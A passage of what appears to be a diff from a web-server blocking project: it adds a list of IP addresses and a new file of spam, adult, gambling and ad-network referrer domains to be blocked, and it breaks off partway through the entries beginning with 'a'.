+8.153.105.168
+8.153.36.169
+8.20.22.58
+8.208.10.94
+8.208.79.61
+8.209.204.4
+8.209.246.167
+8.209.83.9
+8.209.90.19
+8.209.96.247
+8.209.96.38
+8.209.97.27
+8.210.123.17
+8.210.21.103
+8.210.32.253
+8.210.51.175
+8.210.53.43
+8.211.162.45
+8.211.198.30
+8.211.199.102
+8.211.33.23
+8.211.37.65
+8.211.39.61
+8.211.42.134
+8.211.42.24
+8.211.42.91
+8.211.43.157
+8.211.43.53
+8.211.44.115
+8.211.44.141
+8.211.44.144
+8.211.44.197
+8.211.45.218
+8.211.45.42
+8.211.46.204
+8.211.46.224
+8.211.47.162
+8.211.47.177
+8.211.47.185
+8.211.47.221
+8.211.47.67
+8.211.48.8
+8.211.48.80
+8.211.50.175
+8.211.50.226
+8.211.51.118
+8.211.51.119
+8.211.51.135
+8.211.51.146
+8.211.51.16
+8.211.51.182
+8.211.51.190
+8.211.51.34
+8.211.51.66
+8.211.52.110
+8.211.52.116
+8.211.52.121
+8.211.52.127
+8.211.52.151
+8.211.52.176
+8.211.52.6
+8.211.52.80
+8.213.149.9
+8.213.197.49
+8.213.26.140
+8.213.27.245
+8.213.32.23
+8.215.3.241
+8.216.65.159
+8.216.65.177
+8.216.65.225
+8.216.66.248
+8.216.67.37
+8.216.80.166
+8.216.80.210
+8.216.81.10
+8.216.86.132
+8.216.87.246
+8.216.87.61
+8.216.93.203
+8.216.95.169
+8.217.10.15
+8.217.114.8
+8.217.171.143
+8.217.232.213
+8.217.43.77
+8.217.45.128
+8.218.107.73
+8.218.12.181
+8.218.163.254
+8.218.175.160
+8.218.203.129
+8.218.22.143
+8.218.220.42
+8.218.47.170
+8.218.48.219
+8.218.97.135
+8.219.101.217
+8.219.106.191
+8.219.123.212
+8.219.126.110
+8.219.126.14
+8.219.135.183
+8.219.139.133
+8.219.144.149
+8.219.148.168
+8.219.157.124
+8.219.157.156
+8.219.163.225
+8.219.164.91
+8.219.168.15
+8.219.168.69
+8.219.169.69
+8.219.182.10
+8.219.188.212
+8.219.189.216
+8.219.202.171
+8.219.214.94
+8.219.217.21
+8.219.218.68
+8.219.222.66
+8.219.223.199
+8.219.230.107
+8.219.230.175
+8.219.233.233
+8.219.237.171
+8.219.238.71
+8.219.243.105
+8.219.243.250
+8.219.248.225
+8.219.250.192
+8.219.252.228
+8.219.254.100
+8.219.40.251
+8.219.48.65
+8.219.54.201
+8.219.59.96
+8.219.61.177
+8.219.63.72
+8.219.69.112
+8.219.9.139
+8.219.94.62
+8.219.99.227
+8.220.185.175
+8.220.201.94
+8.221.105.3
+8.221.107.223
+8.221.136.154
+8.221.136.170
+8.221.136.6
+8.221.136.98
+8.221.137.163
+8.221.137.196
+8.221.137.208
+8.221.137.58
+8.221.138.102
+8.221.138.209
+8.221.138.213
+8.221.138.237
+8.221.139.116
+8.221.139.21
+8.221.139.48
+8.221.139.8
+8.221.140.220
+8.221.140.221
+8.221.141.128
+8.221.141.131
+8.221.141.179
+8.221.141.186
+8.221.141.224
+8.221.141.33
+8.221.141.40
+8.221.142.108
+8.221.142.130
+8.222.128.126
+8.222.128.242
+8.222.132.12
+8.222.132.42
+8.222.137.97
+8.222.138.125
+8.222.140.84
+8.222.143.176
+8.222.149.166
+8.222.151.66
+8.222.152.112
+8.222.153.41
+8.222.157.113
+8.222.160.59
+8.222.162.33
+8.222.163.23
+8.222.164.201
+8.222.164.227
+8.222.166.37
+8.222.172.1
+8.222.172.249
+8.222.173.158
+8.222.181.107
+8.222.181.172
+8.222.183.153
+8.222.191.156
+8.222.197.183
+8.222.204.225
+8.222.204.75
+8.222.217.70
+8.222.226.153
+8.222.233.55
+8.222.243.76
+8.222.244.108
+80.103.63.114
+80.11.197.243
+80.112.141.230
+80.13.153.140
+80.14.70.114
+80.151.154.196
+80.152.155.172
+80.171.29.20
+80.19.129.243
+80.211.186.224
+80.211.239.9
+80.227.147.94
+80.227.238.170
+80.232.183.222
+80.233.77.125
+80.240.252.168
+80.242.208.68
+80.242.56.181
+80.249.113.55
+80.253.31.232
+80.64.30.127
+80.64.30.139
+80.64.30.32
+80.66.75.106
+80.66.75.207
+80.66.75.57
+80.66.76.121
+80.66.76.130
+80.66.76.134
+80.66.83.114
+80.66.83.201
+80.66.83.46
+80.66.83.47
+80.66.83.48
+80.66.83.49
+80.67.167.81
+80.67.172.162
+80.68.7.50
+80.75.212.46
+80.75.212.85
+80.75.212.9
+80.76.51.113
+80.76.51.249
+80.82.65.82
+80.82.70.133
+80.82.77.139
+80.82.77.144
+80.82.77.202
+80.82.77.33
+80.85.241.43
+80.85.84.75
+80.89.193.5
+80.93.187.184
+80.94.92.106
+80.94.92.139
+80.94.95.226
+80.94.95.235
+80.94.95.239
+80.94.95.248
+80.94.95.81
+80.99.217.205
+81.100.102.178
+81.12.39.194
+81.13.62.77
+81.130.174.76
+81.130.230.202
+81.133.106.57
+81.133.49.189
+81.143.212.121
+81.145.49.190
+81.16.170.117
+81.161.238.12
+81.161.238.160
+81.161.238.40
+81.161.238.41
+81.161.238.56
+81.161.238.94
+81.17.25.50
+81.177.125.9
+81.182.15.230
+81.192.46.38
+81.192.46.45
+81.192.46.49
+81.192.87.130
+81.211.35.220
+81.214.143.203
+81.22.51.64
+81.225.172.50
+81.225.89.235
+81.237.110.29
+81.245.243.115
+81.248.56.130
+81.28.167.30
+81.3.14.20
+81.30.162.18
+81.41.186.140
+81.45.40.245
+81.69.197.181
+81.86.245.59
+81.88.52.217
+81.94.143.47
+81.95.228.161
+82.102.19.87
+82.127.91.52
+82.129.224.250
+82.157.247.165
+82.181.23.147
+82.19.12.103
+82.193.121.147
+82.194.55.5
+82.196.3.179
+82.196.9.140
+82.197.66.43
+82.2.48.56
+82.200.65.218
+82.207.8.154
+82.207.8.194
+82.207.8.202
+82.207.8.218
+82.207.9.150
+82.208.23.192
+82.213.2.174
+82.221.131.5
+82.223.81.189
+82.5.255.64
+82.57.54.179
+82.62.139.143
+82.64.186.234
+82.64.83.73
+82.64.92.97
+82.65.43.136
+82.66.153.209
+82.66.156.19
+82.66.195.135
+82.97.249.164
+83.136.176.12
+83.147.245.231
+83.168.69.18
+83.171.110.159
+83.171.89.209
+83.212.126.31
+83.217.213.206
+83.220.247.57
+83.222.190.230
+83.222.190.242
+83.222.190.66
+83.222.190.90
+83.222.190.94
+83.222.191.130
+83.222.191.150
+83.222.191.166
+83.222.191.212
+83.222.191.42
+83.222.191.62
+83.222.191.70
+83.222.191.82
+83.222.191.94
+83.229.126.78
+83.229.74.210
+83.233.182.145
+83.233.30.104
+83.235.16.111
+83.249.107.29
+83.41.34.202
+84.122.81.36
+84.131.117.210
+84.191.209.87
+84.21.173.111
+84.21.173.43
+84.22.147.211
+84.226.72.131
+84.238.92.245
+84.239.16.162
+84.239.43.175
+84.239.46.144
+84.243.7.98
+84.247.129.109
+84.247.173.42
+84.247.181.71
+84.247.189.91
+84.33.157.157
+84.43.254.214
+84.51.31.138
+84.52.103.234
+84.52.224.184
+84.54.115.46
+84.54.64.50
+84.96.22.36
+85.0.254.50
+85.105.151.130
+85.111.16.166
+85.111.24.98
+85.113.52.208
+85.130.183.23
+85.130.200.51
+85.152.35.20
+85.152.57.61
+85.159.164.28
+85.18.236.229
+85.19.195.12
+85.192.24.211
+85.192.24.79
+85.192.25.243
+85.192.31.104
+85.192.56.68
+85.192.61.181
+85.192.63.157
+85.2.186.140
+85.208.253.197
+85.208.253.26
+85.208.253.54
+85.208.96.200
+85.208.96.209
+85.209.11.183
+85.209.11.184
+85.209.11.185
+85.209.11.187
+85.209.11.189
+85.209.11.191
+85.209.11.192
+85.209.11.71
+85.209.11.73
+85.209.11.79
+85.209.11.89
+85.209.11.99
+85.215.151.96
+85.216.5.152
+85.229.128.128
+85.229.128.89
+85.229.143.201
+85.237.57.200
+85.239.238.159
+85.24.168.235
+85.245.107.230
+85.247.2.222
+85.252.10.186
+85.26.138.26
+85.31.47.22
+85.31.47.40
+85.31.47.61
+85.31.47.7
+85.31.47.93
+85.46.111.41
+85.48.102.89
+85.69.178.104
+85.70.45.245
+85.85.196.35
+85.9.102.65
+85.90.246.159
+85.95.166.40
+86.102.131.54
+86.136.158.20
+86.142.226.14
+86.143.206.0
+86.162.120.32
+86.201.164.195
+86.207.189.245
+86.243.5.84
+86.28.76.180
+86.57.172.88
+86.81.117.20
+87.101.135.122
+87.103.126.54
+87.103.175.140
+87.106.107.93
+87.106.124.105
+87.106.224.241
+87.106.52.43
+87.106.81.95
+87.107.175.4
+87.120.112.131
+87.120.112.169
+87.120.112.202
+87.120.112.234
+87.120.112.37
+87.120.113.120
+87.120.113.139
+87.120.113.185
+87.120.113.249
+87.120.114.229
+87.120.114.8
+87.120.115.34
+87.120.115.50
+87.120.115.94
+87.120.116.145
+87.120.116.167
+87.120.116.202
+87.120.116.204
+87.120.116.205
+87.120.116.254
+87.120.116.28
+87.120.116.68
+87.120.116.81
+87.120.117.228
+87.120.120.16
+87.120.120.22
+87.120.120.24
+87.120.120.29
+87.120.120.41
+87.120.120.50
+87.120.120.52
+87.120.125.212
+87.120.125.213
+87.120.126.101
+87.120.165.54
+87.120.84.223
+87.121.86.84
+87.121.86.87
+87.198.60.32
+87.201.127.149
+87.225.106.84
+87.228.19.57
+87.236.141.106
+87.236.176.10
+87.236.176.101
+87.236.176.105
+87.236.176.106
+87.236.176.107
+87.236.176.108
+87.236.176.113
+87.236.176.114
+87.236.176.115
+87.236.176.116
+87.236.176.117
+87.236.176.120
+87.236.176.121
+87.236.176.122
+87.236.176.123
+87.236.176.126
+87.236.176.127
+87.236.176.128
+87.236.176.131
+87.236.176.134
+87.236.176.137
+87.236.176.14
+87.236.176.142
+87.236.176.145
+87.236.176.146
+87.236.176.15
+87.236.176.155
+87.236.176.157
+87.236.176.159
+87.236.176.160
+87.236.176.161
+87.236.176.162
+87.236.176.167
+87.236.176.168
+87.236.176.169
+87.236.176.17
+87.236.176.174
+87.236.176.176
+87.236.176.177
+87.236.176.180
+87.236.176.181
+87.236.176.182
+87.236.176.183
+87.236.176.185
+87.236.176.187
+87.236.176.190
+87.236.176.192
+87.236.176.193
+87.236.176.195
+87.236.176.196
+87.236.176.198
+87.236.176.200
+87.236.176.201
+87.236.176.202
+87.236.176.204
+87.236.176.206
+87.236.176.217
+87.236.176.218
+87.236.176.22
+87.236.176.222
+87.236.176.224
+87.236.176.226
+87.236.176.227
+87.236.176.229
+87.236.176.23
+87.236.176.230
+87.236.176.231
+87.236.176.232
+87.236.176.236
+87.236.176.238
+87.236.176.239
+87.236.176.240
+87.236.176.243
+87.236.176.245
+87.236.176.246
+87.236.176.247
+87.236.176.248
+87.236.176.25
+87.236.176.251
+87.236.176.252
+87.236.176.28
+87.236.176.29
+87.236.176.3
+87.236.176.34
+87.236.176.37
+87.236.176.38
+87.236.176.4
+87.236.176.43
+87.236.176.44
+87.236.176.45
+87.236.176.47
+87.236.176.48
+87.236.176.5
+87.236.176.50
+87.236.176.51
+87.236.176.52
+87.236.176.53
+87.236.176.56
+87.236.176.58
+87.236.176.60
+87.236.176.62
+87.236.176.65
+87.236.176.67
+87.236.176.68
+87.236.176.69
+87.236.176.75
+87.236.176.78
+87.236.176.8
+87.236.176.81
+87.236.176.82
+87.236.176.84
+87.236.176.86
+87.236.176.87
+87.236.176.9
+87.236.176.90
+87.236.176.93
+87.236.176.95
+87.236.176.97
+87.236.176.98
+87.247.158.120
+87.247.158.148
+87.247.158.192
+87.247.158.222
+87.247.158.223
+87.247.158.224
+87.248.1.199
+87.248.226.146
+87.255.193.50
+87.27.115.70
+87.8.66.218
+88.10.209.218
+88.129.112.124
+88.129.112.126
+88.129.208.46
+88.135.68.5
+88.147.30.59
+88.149.204.114
+88.157.223.242
+88.182.251.194
+88.201.189.216
+88.204.204.78
+88.205.172.170
+88.214.25.16
+88.214.25.62
+88.214.25.63
+88.214.25.64
+88.214.25.65
+88.248.118.188
+88.248.2.252
+88.80.20.49
+88.80.26.2
+88.87.80.237
+88.87.84.104
+88.97.225.236
+89.101.238.143
+89.116.24.125
+89.116.26.240
+89.116.26.5
+89.117.120.135
+89.117.94.117
+89.144.201.65
+89.144.211.20
+89.147.108.90
+89.147.110.118
+89.153.62.100
+89.160.118.239
+89.160.6.62
+89.160.94.158
+89.163.142.145
+89.165.1.16
+89.168.118.238
+89.169.52.16
+89.169.53.80
+89.169.54.43
+89.179.33.126
+89.183.192.115
+89.183.192.70
+89.185.85.104
+89.188.76.72
+89.188.76.74
+89.190.156.205
+89.208.103.230
+89.208.103.36
+89.208.104.147
+89.208.97.150
+89.208.97.186
+89.218.69.66
+89.22.229.123
+89.22.233.73
+89.22.237.65
+89.232.73.146
+89.234.157.254
+89.235.118.155
+89.242.1.19
+89.248.163.197
+89.248.163.200
+89.248.163.26
+89.248.165.102
+89.248.165.244
+89.248.167.131
+89.248.168.227
+89.248.172.16
+89.25.81.68
+89.251.9.127
+89.252.146.211
+89.26.249.46
+89.37.95.34
+89.39.121.190
+89.40.105.187
+89.58.26.216
+89.58.41.156
+89.97.218.142
+9.141.19.28
+90.144.71.52
+90.151.171.106
+90.151.171.109
+90.154.46.138
+90.160.139.163
+90.176.67.60
+90.188.113.216
+90.225.68.108
+90.229.216.53
+90.239.30.219
+90.66.58.183
+91.108.244.182
+91.113.38.55
+91.121.2.118
+91.121.58.183
+91.132.144.59
+91.134.218.239
+91.134.248.192
+91.134.248.249
+91.135.108.160
+91.135.244.200
+91.136.11.85
+91.139.160.150
+91.144.130.67
+91.144.18.11
+91.144.20.198
+91.144.21.170
+91.147.93.36
+91.148.190.150
+91.151.128.225
+91.151.238.195
+91.151.95.24
+91.185.237.67
+91.187.123.160
+91.191.209.198
+91.191.209.218
+91.191.209.234
+91.191.209.74
+91.192.167.201
+91.194.84.88
+91.201.215.187
+91.205.219.185
+91.206.26.26
+91.209.235.28
+91.213.99.45
+91.218.64.199
+91.219.237.56
+91.220.204.168
+91.223.169.83
+91.227.62.26
+91.235.247.80
+91.238.181.20
+91.238.181.21
+91.238.181.22
+91.238.181.23
+91.238.181.31
+91.238.181.32
+91.238.181.33
+91.238.181.34
+91.238.181.35
+91.239.19.66
+91.240.61.14
+91.244.113.178
+91.245.227.97
+91.66.62.86
+91.74.30.24
+91.74.43.17
+91.75.14.80
+91.77.163.86
+91.90.121.156
+91.92.130.12
+91.92.199.36
+92.100.176.120
+92.100.190.47
+92.118.115.145
+92.118.39.100
+92.118.39.101
+92.118.39.115
+92.118.39.152
+92.118.39.210
+92.118.39.244
+92.118.39.34
+92.118.39.36
+92.118.39.81
+92.118.39.83
+92.118.39.84
+92.118.58.202
+92.126.223.175
+92.15.149.52
+92.191.96.7
+92.204.144.151
+92.204.254.217
+92.205.108.83
+92.205.177.188
+92.205.182.254
+92.205.185.112
+92.205.190.58
+92.205.231.90
+92.221.101.111
+92.222.141.85
+92.222.171.6
+92.222.177.43
+92.222.180.245
+92.222.181.145
+92.222.181.205
+92.246.136.45
+92.246.139.107
+92.246.84.133
+92.249.48.232
+92.252.218.35
+92.255.195.59
+92.255.196.185
+92.255.57.150
+92.255.57.44
+92.255.57.58
+92.255.57.59
+92.255.57.60
+92.255.85.107
+92.255.85.188
+92.255.85.189
+92.255.85.253
+92.255.85.26
+92.255.85.27
+92.255.85.28
+92.255.85.29
+92.255.85.35
+92.255.85.36
+92.255.85.37
+92.255.85.50
+92.255.85.51
+92.255.85.52
+92.27.101.99
+92.27.157.252
+92.27.247.25
+92.31.0.236
+92.42.96.51
+92.53.107.148
+92.55.190.215
+92.62.243.154
+92.62.243.174
+92.63.197.210
+92.87.22.210
+92.99.195.204
+93.108.120.147
+93.113.61.126
+93.113.63.124
+93.120.240.202
+93.123.109.142
+93.123.109.153
+93.123.171.3
+93.123.194.205
+93.123.39.73
+93.123.39.97
+93.123.85.205
+93.157.248.178
+93.160.174.27
+93.174.93.12
+93.174.95.106
+93.182.160.222
+93.182.160.223
+93.182.161.109
+93.182.161.110
+93.182.161.111
+93.182.161.112
+93.182.161.113
+93.182.161.125
+93.183.131.53
+93.183.185.21
+93.185.73.178
+93.188.83.96
+93.223.173.155
+93.37.106.80
+93.51.29.145
+93.64.108.27
+93.70.67.4
+93.92.136.217
+94.102.49.190
+94.102.49.193
+94.102.51.15
+94.102.56.99
+94.103.125.122
+94.103.125.176
+94.103.125.80
+94.110.234.193
+94.127.212.198
+94.140.210.134
+94.141.120.106
+94.141.120.11
+94.141.120.120
+94.141.120.144
+94.141.120.147
+94.141.120.150
+94.141.120.184
+94.141.120.186
+94.141.120.188
+94.141.120.194
+94.141.120.242
+94.141.120.245
+94.141.120.28
+94.141.120.33
+94.141.120.36
+94.141.120.6
+94.141.120.86
+94.142.138.152
+94.142.244.16
+94.143.85.189
+94.154.34.220
+94.154.82.35
+94.156.166.49
+94.156.166.81
+94.156.167.17
+94.156.167.171
+94.156.167.19
+94.156.167.205
+94.156.167.217
+94.156.167.76
+94.156.167.77
+94.156.167.83
+94.156.177.103
+94.156.177.108
+94.156.177.121
+94.156.177.138
+94.156.177.17
+94.156.177.213
+94.156.177.214
+94.156.177.26
+94.156.177.3
+94.156.177.39
+94.156.177.40
+94.156.177.55
+94.156.177.60
+94.156.177.7
+94.156.227.110
+94.159.104.177
+94.159.44.234
+94.159.59.30
+94.177.106.38
+94.179.107.98
+94.179.109.66
+94.182.176.185
+94.187.170.251
+94.190.114.20
+94.20.154.159
+94.200.211.186
+94.202.38.155
+94.204.192.242
+94.204.45.174
+94.206.41.18
+94.207.22.124
+94.228.162.228
+94.228.163.98
+94.228.169.57
+94.23.145.155
+94.230.141.38
+94.230.208.147
+94.230.232.13
+94.230.232.14
+94.231.123.72
+94.232.247.171
+94.232.42.99
+94.254.0.234
+94.255.198.236
+94.43.11.19
+94.52.209.104
+94.53.155.34
+94.61.7.100
+94.67.125.162
+94.67.252.136
+94.72.98.8
+94.75.225.81
+95.105.113.109
+95.111.198.218
+95.128.69.10
+95.129.113.9
+95.130.227.131
+95.130.227.150
+95.130.227.80
+95.160.28.219
+95.163.152.41
+95.163.153.202
+95.165.26.166
+95.165.29.72
+95.165.65.191
+95.167.133.86
+95.167.225.76
+95.169.205.243
+95.171.10.74
+95.173.191.84
+95.174.104.112
+95.174.99.133
+95.181.160.107
+95.181.162.166
+95.181.173.115
+95.181.86.2
+95.188.64.5
+95.213.154.184
+95.214.27.168
+95.214.27.169
+95.214.27.170
+95.214.27.18
+95.214.27.29
+95.214.27.30
+95.214.27.31
+95.214.27.32
+95.214.27.33
+95.214.27.38
+95.214.27.39
+95.214.27.40
+95.214.27.41
+95.214.53.205
+95.214.53.211
+95.214.53.91
+95.214.54.151
+95.214.55.43
+95.214.55.79
+95.217.113.121
+95.220.25.124
+95.221.233.251
+95.229.100.106
+95.231.227.242
+95.24.11.249
+95.246.186.254
+95.255.108.3
+95.255.111.234
+95.31.6.109
+95.58.255.251
+95.79.108.51
+95.81.86.187
+95.84.137.101
+95.84.148.71
+95.85.112.170
+95.85.114.218
+95.85.47.10
+95.86.209.249
+95.87.248.223
+95.89.44.26
+95.9.222.122
+95.90.242.212
+95.90.93.96
+95.91.119.189
+95.91.237.70
+96.10.249.114
+96.126.108.248
+96.126.120.128
+96.126.120.164
+96.126.120.184
+96.126.126.63
+96.126.96.144
+96.18.32.153
+96.19.196.83
+96.239.60.74
+96.249.234.242
+96.67.59.65
+96.69.13.140
+96.77.117.189
+96.78.175.36
+96.79.174.131
+96.79.249.93
+96.84.171.85
+96.84.234.234
+96.88.153.181
+97.100.112.124
+97.107.138.196
+97.107.139.11
+97.107.139.29
+97.107.139.94
+97.107.140.102
+97.107.140.160
+97.70.129.101
+97.74.81.214
+97.74.83.185
+97.74.87.26
+97.74.87.44
+97.86.134.216
+97.98.79.32
+98.102.148.242
+98.102.193.43
+98.102.58.10
+98.11.20.53
+98.110.70.2
+98.128.173.33
+98.128.254.210
+98.14.144.113
+98.159.237.44
+98.220.97.188
+98.23.39.74
+98.24.163.2
+98.40.228.65
+98.47.116.86
+98.6.43.108
+98.70.15.43
+98.70.79.163
+98.97.135.131
diff --git a/db/bad-referrers.txt b/db/bad-referrers.txt
new file mode 100644
index 00000000..75f087ff
--- /dev/null
+++ b/db/bad-referrers.txt
@@ -0,0 +1,7105 @@
+000free.us
+007angels.com
+00author.com
+00go.com
+00it.com
+00webcams.com
+01apple.com
+03e.info
+03p.info
+08800.top
+0912701309f8ce.com
+0c47f8422d3f.com
+0daymusic.org
+0lovespells0.blogspot.com
+0n-line.tv
+1-99seo.com
+1-free-share-buttons.com
+1000n1.ru
+1001desert.com
+1001watch.com.ua
+1008.su
+100dollars-seo.com
+100searchengines.com
+101billion.com
+101flag.ru
+101lesbian.xyz
+101raccoon.ru
+108shot.com
+10bet.com
+11235813.webzdarma.cz
+11pikachu.ru
+123any.com
+123cha.com
+123kuma.com
+123locker.com
+123movies.love
+12bet.com
+12masterov.com
+12u.info
+1314dh.com
+13tabs.com
+14b.info
+1688.com
+178evakuator178.ru
+18ps.ru
+1adult.com
+1bet.com
+1flag.co.za
+1hwy.com
+1j7740kd.website
+1kdailyprofit.me
+1kinobig.ru
+1millionusd.xyz
+1pamm.ru
+1qingdao.com
+1stat.ru
+1webmaster.ml
+1xbet4you.com
+2000k.ru
+2015god.org
+2020iscoming.info
+202ch.com
+20pascals.nl
+214jaluwobapef.cf
+21h2o.com
+2345.com
+23kw.ru
+24-ak.ru
+24videos.tv
+24x7-server-support.site
+256bit.by
+2728fb936f0.com
+273-fz.ru
+28n2gl3wfyb0.ru
+2ads.co.uk
+2daytrendingnews.com
+2drittel.de
+2girls1cup-free.com
+2itech.ru
+2kata.ru
+2nt.ru
+2pxg8bcf.top
+2rich4bitches.com
+2x2fan.ru
+3-letter-domains.net
+300richmond.co.nz
+34.gs
+3dracergames.com
+3rbseyes.com
+3th.co.in
+3w24.com
+3weekdiet.com
+3xforum.ro
+404.mn
+40cg.com
+45en.ru
+4inn.ru
+4istoshop.com
+4k-player.pl
+4kepics.com
+4kpics.rocks
+4kplayer.pl
+4pp13.com
+4rent.ru
+4replicawatch.net
+4senses.co
+4ur.click
+4ureyesonly.com
+4webmasters.com
+4webmasters.org
+5-steps-to-start-business.com
+5000-cotydzien.com
+51.la
+51unlim.ru
+55wmz.ru
+57883.net
+5elementov.ru
+5forex.ru
+5i2.net
+5kstore.com
+5tey7463.weebly.com
+5u.com
+5ws.dating-app.ru
+6128786.com
+66cpwgln.space
+6hopping.com
+70casino.online
+72-news.com
+76brighton.co.uk
+777-club.ru
+7a2rnuey1tw9ar.ru
+7fon.ru
+7makemoneyonline.com
+7minuteworkout.com
+7ooo.ru
+7search.com
+7wind.ru
+7xc4n.com
+7yue.org
+7zap.com
+83net.jp
+8558l.jobs.net
+883zy.com
+888.com
+8gold.com
+8jn.dating-app.ru
+8kisses.eu
+8lufu.com
+8si.ru
+8xv8.com
+91abcw.com
+98oi.ru
+991mostfm.co.id
+999webdesign.com
+9icmzvn6.website
+9med.net
+DomainStatsBot
+a.frcls.fr
+a.pr-cy.ru
+a14download.com
+a1security.com.ua
+a96527gi.beget.tech
+aa08daf7e13b6345e09e92f771507fa5f4.com
+aa14ab57a3339c4064bd9ae6fad7495b5f.com
+aa625d84f1587749c1ab011d6f269f7d64.com
+aa81bf391151884adfa3dd677e41f94be1.com
+aa8780bb28a1de4eb5bff33c28a218a930.com
+aa8b68101d388c446389283820863176e7.com
+aa9bd78f328a6a41279d0fad0a88df1901.com
+aa9d046aab36af4ff182f097f840430d51.com
+aaa38852e886ac4af1a3cff9b47cab6272.com
+aab94f698f36684c5a852a2ef272e031bb.com
+aac500b7a15b2646968f6bd8c6305869d7.com
+aac52006ec82a24e08b665f4db2b5013f7.com
+aad1f4acb0a373420d9b0c4202d38d94fa.com
+aadroid.net
+aanapa.ru
+aarbur.com
+aaronabel.com
+aasoldes.fr
+abbanreddy.com
+abcdefh.xyz
+abcdeg.xyz
+abcguru.xyz
+abclauncher.com
+abctoppictures.net
+abiente.ru
+above.com
+abovetherivernc.com
+absolute-s.ru
+absolutelyanalog.com
+absugars.com
+abtasty.com
+abusora.com
+abwa.tk
+academia-nsk.org
+academiacsmendoza.org
+acads.net
+acc.eu.org
+accessoires-mode.in
+acgs.tk
+acheterviagrafr24.com
+acmebtn.ml
+acortarurl.es
+actices.com
+actionnooz.com
+activecampaign.dreamhosters.com
+activepr.ru
+actulite.com
+acunetix-referrer.com
+ad-words.ru
+adamoads.com
+adanih.com
+adbetclickin.pink
+adcash.com
+adclickservice.com
+adclickthru.net
+adconscious.com
+add-add.men
+addbin.men
+addblueoff.com.ua
+addray.pro
+addtoadd.men
+adelly.bg
+adexprts.com
+adf.ly
+adhome.biz
+adidas.frwebs.fr
+adimmix.com
+adinterax.com
+adktrailmap.com
+adloads.com
+adloads.net
+adman.gr
+adman.se
+admanaerofoil.com
+admatic.com.tr
+admeasures.com
+adminshop.com
+admitad.com
+adnotbad.com
+adobereader-free.ru
+adpremium.org
+adprotect.net
+adrenalin-stk.ru
+adrunnr.com
+ads-cool.pro
+ads-seo.men
+ads.gold
+ads.tremorhub.com
+adserver-e7.com
+adservme.com
+adsfresh.men
+adsland.men
+adsloads.com
+adsref.men
+adssafeprotected.com
+adtech.de
+adtech.fr
+adtech.us
+adtiger.tk
+adtology.com
+adult-shop.com.ua
+adult3dgames.com
+adultactioncam.com
+adultfriendfinder.com
+adultfullhd.com
+adultgalls.com
+adultmeetonline.info
+adultnet.in
+adultwebhosting.info
+advancedcleaner.com
+advancedmassagebysara.com
+advancedsoftwaresupport.com
+adventureparkcostarica.com
+adverster.com
+advertex.info
+advertisingtag.net
+adviceforum.info
+advocatemsk.ru
+advokat-grodno.by
+advokateg.ru
+advokateg.xyz
+adzerg.com
+adzpower.com
+aero2.ru
+aerogo.com
+affiliate-fr.com
+affordablewebsitesandmobileapps.com
+affrh2015.com
+afftrack001.com
+afmuseum.com
+afora.ru
+afslankpillen2017nl.eu
+agadelha.com.br
+agahinameh.com
+agapovdg.ru
+agardomains.com
+agecheckadult.com
+ageofclones.com
+aghanyna.com
+agreda.pluto.ro
+agroeconom.kz
+agysya.ru
+ahhjf.com
+ahmedabadwebs.com
+ahrefs.com
+ahrntal.verymes.xyz
+aibolita.com
+aihelen.net
+aimayangzhi.com
+air-edem.ru
+airlandsea.info
+airmaxshoes-2016.com
+akama.com
+akita.kz
+aksonural.ru
+aktivator-windows10.blogspot.com
+aktobe.xkaz.org
+akuhni.by
+akusherok.ru
+akvamaster.dp.ua
+alarmobninsk.ru
+albamargroup.com
+alborzan.com
+albumsuper.info
+albuteroli.com
+ald2014.org
+alekseevec.ru
+alert-fdm.xyz
+alert-fjg.xyz
+alert-hgd.xyz
+alert-jdh.xyz
+alert.scansafe.net
+alessandraleone.com
+alevinefesleri.com
+alf-img.com
+alfa-img.com
+alfa-medosmotr.ru
+alfa9.com
+alfabot.xyz
+alfapro.ru
+algarveglobal.com
+algerianembassy.co.in
+alibestsale.com
+alice.it
+alienwheel.es
+alienwheels.de
+aliexpresscashback.club
+alif-ba-ta.com
+alive-ua.com
+alkoravto.ru
+all-number.com
+all-streaming-media.com
+all4invest.info
+all4invest.ru
+all4wap.ru
+allbizne.co.ua
+allblogroll.com
+allboard.xobor.de
+allcredits.su
+alldezservice.kz
+alldownload.pw
+alldubai.biz
+allesohnegirls.net
+allfinweb.com
+allforminecraft.ru
+allknow.info
+allkrim.com
+allmarketsnewdayli.gdn
+allnews.md
+allnews24.in
+allornamenti.com
+alloysteel.ru
+allpdfmags.net
+allproblog.com
+allsilver925.co.il
+allstatesugarbowl.org
+alltheviews.com
+allwidewallpapers.com
+allwomen.info
+aloofly.com
+alot.com
+alphacarolinas.com
+alphaforum.ru
+alphahoverboards.com
+alpharma.net
+alphavisions.net
+alpinism.ru
+alt-servis.ru
+alta-realestate.com
+altamayoztourism.com
+aludecor.info
+alveris.ru
+alvtank.se
+alyeskaresort.com
+am-se.com
+am15.net
+amanda-porn.ga
+amateurgalls.com
+amateurlivechat.org
+amateurmatch.com
+amazingninja.com
+amazingpic.net
+amazon-adsystem.com
+amazon-seo-service.com
+ameblo.jp
+ameblo.top
+amehdaily.com
+amigobulls.com
+amoi.tn
+amospalla.es
+ample-awards-today.us
+ampower.me
+amt-k.ru
+amung.us
+amyfoxfitness.com
+an-donut.com
+anabolics.shop
+anaksma.info
+anal-acrobats.com
+anal-acrobats.hol.es
+analnoeporno.tv
+analytics-ads.xyz
+ananumous.ru
+anapa-inns.ru
+anaseracresar.tk
+anatomiy.com
+andpolice.com
+android-style.com
+android-systems.ru
+android-vsem.org
+android4fun.org
+androids-store.com
+angel1777.kz
+angigreene.com
+angkortours.vn
+angry-fermi-7633.arukascloud.io
+animal-drawings.com
+animal36.com
+animali.deagostinipassion.it
+animalia-life.club
+animalrank.com
+animaltoplist.com
+anime.dougasouko.com
+animebox.com.ua
+animenime.ru
+anjalika.co.in
+anlimebel.kiev.ua
+anmysite.com
+anniemation.com
+anonymizeme.pro
+anonymous-redirect.com
+anonymousfox.co
+anti-virus-removal.info
+anticrawler.org
+antons-transporte.de
+aosexkontakte.net
+aosheng-tech.com
+ap.senai.br
+apartamentwroclaw.eu
+apartment.ru
+apartmentbay.ru
+apartmentratings.com
+apccargo.com
+apelsinnik.website
+apessay.com
+api.stathat.com
+apiadanaknet-a.akamaihd.net
+apiallgeniusinfo-a.akamaihd.net
+apiappenableinfo-a.akamaihd.net
+apibatbrowsecom-a.akamaihd.net
+apibetweenlinesn-a.akamaihd.net
+apibrowsesmartne-a.akamaihd.net
+apidiamondatanet-a.akamaihd.net
+apidigidocketnet-a.akamaihd.net
+apifasterlightin-a.akamaihd.net
